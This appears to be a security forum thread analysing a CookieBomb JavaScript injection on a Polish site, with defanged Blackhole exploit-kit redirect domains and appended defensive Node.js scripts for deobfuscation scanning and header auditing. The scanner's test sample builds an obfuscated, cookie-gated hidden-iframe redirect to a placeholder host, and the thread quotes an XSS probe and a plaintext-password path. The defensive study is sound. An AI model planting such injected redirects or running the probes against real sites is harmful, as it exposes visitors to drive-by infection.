Detected malicious CookieBomb javascript by avast! Web Shield!

Reported to me by my good forum friend Pondus as he stumbled upon this malcode found here:
htxp://urlquery.net/report.php?id=4486758
Do not venture out there, because that urlquery.net URI will be blocked immediately by the avast! Web Shield as:
JS:iframe-CSU[Trj] redirecting to a Blackhole Exploit kit
Re: http://sitecheck.sucuri.net/results/www.polityczni.pl
also see: http://scanurl.net/?u=http%3A%2F%2Fwww.polityczni.pl%2F&uesb=Check+This+URL#results
See: http://www.google.com/safebrowsing/diagnostic?site=polityczni.pl
and http://www.avgthreatlabs.com/website-safety-reports/domain/polityczni.pl/
htxp://www.quttera.com/detailed_report/www.polityczni.pl this URI is also being blocked by the avast Web Shield, but as JS:Decode-AQC[Trj],
as it is revealing just enough of the malcode to get an avast Web Shield alert!
More info on malicious CookieBomb attacks and encoding here: http://malwaremustdie.blogspot.com/2013/07/a-note-of-modification-of-obfuscation.html
Link article author = unixfreaxjp. Quoted from there:

called this as #CookieBomb attack, it uses the obfuscation JavaScript to burp the hidden redirection via IFRAME and the cookie condition to be used as a ticket for malware infection further malicious redirection

polonus

Various infections mentioned for the IP and that particular domain at VT: https://www.virustotal.com/en/ip-address/79.96.60.21/information/
Analyzing the packet path to 79.96.60.21:

HOST: vmy1.home.net.pl        Loss%   Snt   Last    Avg   Best   Wrst  StDev
  1.|-- adx01.home.net.pl      0.0%     5    2.5    1.6    0.5    2.5    0.8
  2.|-- 62.129.251.154         0.0%     5    0.6   71.0    0.6  193.5   94.0
  3.|-- v066061.home.net.pl    0.0%     5    0.3    0.6    0.3    1.5    0.5
Also the blackhole infection from that IP: http://support.clean-mx.de/clean-mx/viruses?id=13261704

For the cookie bomb javascript malcode redirection read: http://malwaremustdie.blogspot.jp/2013/07/proof-of-concept-of-cookiebomb-attack.html
Link article author and PoC credits: unixfreaxjp.
Here the avast Web Shield also blocks: htxp://evuln.com/tools/malware-scanner/www.polityczni.pl/ …/ | as infected with JS:iframe-CTO[Trj]{gzip}

polonus

and only the top dogs sniff this
https://www.virustotal.com/en/file/4bc03c9a388d8c7b93571cc0b8296af74d786cc7eae46e8251d053f0d2bcc2e5/analysis/1376169217/

Yep Pondus, only the very top dogs like the avast! Web Shield block it right away as the JavaScript code. The others get it in a second stage, as the malcode is trying to redirect some proportion to the Blackhole Exploit kit:
Redirecting to malcode are… (info from the Malware Crusader at Malware Must Die):
h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/

This is combining the evils of PHP injection and JavaScript obfuscation. Always be aware of the 7 potentially insecure functions in JavaScript that could lead to malcode ->: escape(), eval(), link(), unescape(), exec(), search(), combined with content such as HTML tags, iframes, zero-size iframes, lines and hyperlinks.

Know the malcreant never rests, and malware should really be gone!

Damian
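As an added example (not code from this thread, from avast or from Malware Must Die), the following Node.js script does statically what the posts above describe the Web Shield doing on the wire: it peels the eval()/unescape()/String.fromCharCode() layers that Damian lists, without executing anything, and then looks for the two CookieBomb traits quoted from unixfreaxjp, the document.cookie "ticket" check and the hidden IFRAME redirect. The indicator patterns, weights, verdict thresholds and both sample inputs are assumptions made for this example; the injected sample is built here from a readable payload and the redirect URL is a placeholder, not one of the domains listed in the thread.

```javascript
// Added example: static, no-eval scanner for CookieBomb-style injected JavaScript.
// Patterns, weights and sample inputs are assumptions, not a vendor signature.

// Decode %XX / %uXXXX sequences the way unescape() would, without calling it.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u4, h2) => String.fromCharCode(parseInt(u4 || h2, 16)));
}

// One decoding pass: turn unescape("...") and String.fromCharCode(...) into plain
// string literals, then inline eval("literal") so the next layer becomes visible.
function decodeOnce(src) {
  return src
    .replace(/unescape\s*\(\s*(['"])([^'"]*)\1\s*\)/g,
      (_, q, body) => JSON.stringify(percentDecode(body)))
    .replace(/String\.fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g,
      (_, nums) => JSON.stringify(String.fromCharCode(...nums.split(',').map(Number))))
    .replace(/\beval\s*\(\s*("(?:[^"\\]|\\.)*")\s*\)/g,
      (m, lit) => { try { return JSON.parse(lit); } catch (e) { return m; } });
}

// Repeat until nothing changes; the number of passes is the obfuscation depth.
function peelEncodings(src) {
  let code = src, layers = 0;
  for (;;) {
    const next = decodeOnce(code);
    if (next === code) return { code, layers };
    code = next;
    layers += 1;
  }
}

function scanScript(src) {
  const { code, layers } = peelEncodings(src);
  const findings = [];

  // Trait 1: eval() fed by a decoder call in the raw (still encoded) source.
  const obfuscated = /\beval\s*\(/.test(src) &&
    /(?:unescape|String\.fromCharCode|decodeURIComponent|atob)\s*\(/.test(src);
  if (obfuscated) findings.push({ name: 'eval-of-decoded-string', weight: 2 });

  // Trait 2: the cookie "ticket": read document.cookie, then set it.
  const cookieRead = /document\.cookie\s*\.\s*(?:indexOf|match|search|split|includes)/.test(code);
  const cookieWrite = /document\.cookie\s*=[^=]/.test(code);
  const cookieGate = cookieRead && cookieWrite;
  if (cookieGate) findings.push({ name: 'cookie-ticket-check', weight: 2 });

  // Trait 3: an iframe that is hidden, moved off-screen or sized to 0/1 px.
  const makesIframe = /createElement\s*\(\s*['"]iframe['"]\s*\)|<iframe\b/i.test(code);
  const hidesIt = /visibility\s*[:=]\s*['"]?hidden|(?:left|top)\s*[:=]\s*['"]?-\d{3,}px|(?:width|height)\s*[:=]\s*['"]?[01](?:px)?\b/i.test(code);
  const hiddenIframe = makesIframe && hidesIt;
  if (hiddenIframe) findings.push({ name: 'hidden-iframe', weight: 3 });

  // Recover the redirect target(s) for blocking / IR follow-up.
  const iframeSources = [...code.matchAll(/\.src\s*=\s*['"]([^'"]+)['"]/g)].map(m => m[1]);
  const score = findings.reduce((s, f) => s + f.weight, 0);
  const verdict = cookieGate && hiddenIframe ? 'cookiebomb-like' : score >= 4 ? 'suspicious' : 'clean';
  return { layers, score, verdict, findings: findings.map(f => f.name), iframeSources };
}

// Constructed samples (not real captures). The injected one wraps a readable
// payload in two encoding layers; the redirect host is a placeholder.
const PAYLOAD =
  'if(document.cookie.indexOf("__gads_seen")==-1){' +
  'document.cookie="__gads_seen=1; path=/";' +
  'var f=document.createElement("iframe");' +
  'f.style.visibility="hidden";f.style.position="absolute";f.style.left="-9999px";' +
  'f.src="http://redirector.invalid/";document.body.appendChild(f);}';
const pct = s => Array.from(s, c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const layer1 = `eval(unescape("${pct(PAYLOAD)}"))`;
const layer2 = `eval(String.fromCharCode(${Array.from(layer1, c => c.charCodeAt(0)).join(',')}))`;
const SAMPLE_INJECTED = `<html><body><script>${layer2}</script></body></html>`;

// A benign cookie-consent snippet: reads and sets a cookie, but no iframe, no eval.
const SAMPLE_BENIGN = `<script>
if (document.cookie.indexOf("consent=") === -1) {
  document.cookie = "consent=pending; path=/";
  document.getElementById("banner").style.display = "block";
}
</script>`;

console.log(JSON.stringify(scanScript(SAMPLE_INJECTED), null, 2));
console.log(JSON.stringify(scanScript(SAMPLE_BENIGN), null, 2));
```

The decoder deliberately never calls eval(); it only rewrites the three literal forms it understands, so a sample that uses a different packer simply stops peeling and is scored on what is visible, which is also why the raw (pre-peel) source is what the obfuscation indicator looks at. Run it over the index.php files of every template when cleaning a site, since the thread notes the injection is repeated in each of them.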

Hi Pondus,

The CookieBomb javascript malcode trick is performed as described here: http://stackoverflow.com/questions/13764925/simple-way-to-obfuscate-javascript-code-by-php - info T.J. Crowder - (the use is cyber criminal access to credit card information etc.)

The attack is possible through website vulnerabilities; the header gives away that IdeaWebServer/v0.80 is being used.
JS in every template's index.php file, read: http://forum.joomla.org/viewtopic.php?f=714&t=807708 (Matt Simonsen SRI hosting)
All sorts of variations are being made on this same theme.

Website and server admins should really start to harden their software and, what is very important, check that all input data is verified. Here we can establish why that is: https://asafaweb.com/Scan?Url=www.polityczni.pl
There we see an excessive headers warning, as configuring the application to not return unnecessary headers keeps this information silent and makes it significantly more difficult to identify the underlying frameworks,
and a clickjacking warning, as it appears no X-Frame-Options header was returned from the server, which means that this website could be at risk of a clickjacking attack. With the excessive header information, this attack, as we found described in a Google Pastebin cache, could be performed against it:

  • Server: IdeaWebServer/v0.80

  • /cgibin/guestbook/passwd: GuestBook r4 from xxxxxxx.r2 dot ru stores the admin password in a plain text file.

  • /phpimageview.php?pic=javascript:alert(‘Vulnerable’): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. I won’t further dwell on this because it is beyond the scope of this post…
    etc. etc.

pol
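As an added example (not code from this thread, from asafaweb or from any scanner), here is a small Node.js audit of the two header findings discussed in the post above: fingerprinting headers that should not be returned, and a missing or non-enforced X-Frame-Options header (a Content-Security-Policy frame-ancestors directive is accepted as the modern equivalent). Only the Server: IdeaWebServer/v0.80 banner is taken from the thread; both sample responses, the X-Powered-By value and the hardened header set are constructed assumptions.

```javascript
// Added example: audit raw HTTP response headers for excessive-header and
// clickjacking findings. Sample responses are constructed, not captured.

// Turn a raw response head into { status, headers } with lower-cased header names;
// repeated headers are collected into an array.
function parseResponseHead(raw) {
  const lines = raw.split(/\r?\n/).filter(l => l.trim() !== '');
  const status = lines.shift();
  const headers = {};
  for (const line of lines) {
    const i = line.indexOf(':');
    if (i < 0) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    (headers[name] = headers[name] || []).push(value);
  }
  return { status, headers };
}

// Headers whose only effect is to tell an attacker which stack to look up.
const FINGERPRINT_HEADERS = ['server', 'x-powered-by', 'x-aspnet-version', 'x-aspnetmvc-version', 'x-generator'];

// headers: { 'lower-case-name': [values] } as produced by parseResponseHead().
function auditHeaders(headers) {
  const findings = [];
  for (const h of FINGERPRINT_HEADERS) {
    if (headers[h]) findings.push({ id: 'excessive-header', detail: `${h}: ${headers[h].join(', ')}` });
  }

  // Framing is locked by X-Frame-Options DENY/SAMEORIGIN or by a CSP
  // frame-ancestors directive that is not the wildcard. Other XFO values
  // (e.g. ALLOW-FROM) are not enforced by current browsers.
  const xfo = (headers['x-frame-options'] || [])[0];
  const csp = (headers['content-security-policy'] || []).join(';');
  const fa = csp.match(/(?:^|;)\s*frame-ancestors\s+([^;]+)/i);
  const cspFramesLocked = !!fa && fa[1].trim() !== '*';
  if (!xfo && !cspFramesLocked) {
    findings.push({ id: 'clickjacking', detail: 'no X-Frame-Options and no CSP frame-ancestors' });
  } else if (xfo && !/^(?:deny|sameorigin)$/i.test(xfo) && !cspFramesLocked) {
    findings.push({ id: 'clickjacking', detail: `X-Frame-Options value not enforced by browsers: ${xfo}` });
  }
  return findings;
}

function auditRaw(raw) {
  return auditHeaders(parseResponseHead(raw).headers);
}

// Constructed: what a response like the one discussed above could look like
// (Server banner from the thread; the X-Powered-By value is assumed).
const WEAK_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Server: IdeaWebServer/v0.80',
  'X-Powered-By: PHP',
  'Content-Type: text/html; charset=iso-8859-2',
  '',
].join('\r\n');

// Constructed: the same response after removing banners and locking framing.
const HARDENED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  'X-Frame-Options: SAMEORIGIN',
  "Content-Security-Policy: default-src 'self'; frame-ancestors 'self'",
  'X-Content-Type-Options: nosniff',
  '',
].join('\r\n');

console.log('weak:', auditRaw(WEAK_RESPONSE));
console.log('hardened:', auditRaw(HARDENED_RESPONSE));
```

To run it against a live site, feed the output of `curl -sI` into parseResponseHead(); the audit itself stays offline. Suppressing the Server header does not fix the injection vulnerability the thread describes, it only removes the free fingerprint; the X-Frame-Options/CSP fix is what closes the clickjacking warning.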

Still a lot of live malware from that hoster: http://support.clean-mx.de/clean-mx/viruses.php?netname=HOMEPL&sort=url%20desc&response=alive
avast! detects even this → https://www.virustotal.com/en/file/c38d71921f134bc548f4e1e172c6c72aaabf62bb2040c707e9f0837b3034f127/analysis/
Good to also study these for example: http://support.clean-mx.de/clean-mx/view_virusescontent.php?url=http%3A%2F%2Fwww.psltv.pl%2Findex.php%3Fplik%3D1739%26amp%3Bso%3D58
See the attached image of what we treat here in this thread. Read on the code given there here: https://www.phpbb.com/community/viewtopic.php?f=46&t=2188243 (see posting Hellemans2003), particularly see the code here: https://www.phpbb.com/community/viewtopic.php?f=46&t=2188243#
and the reply from NoxWizard a bit further down in that thread…

polonus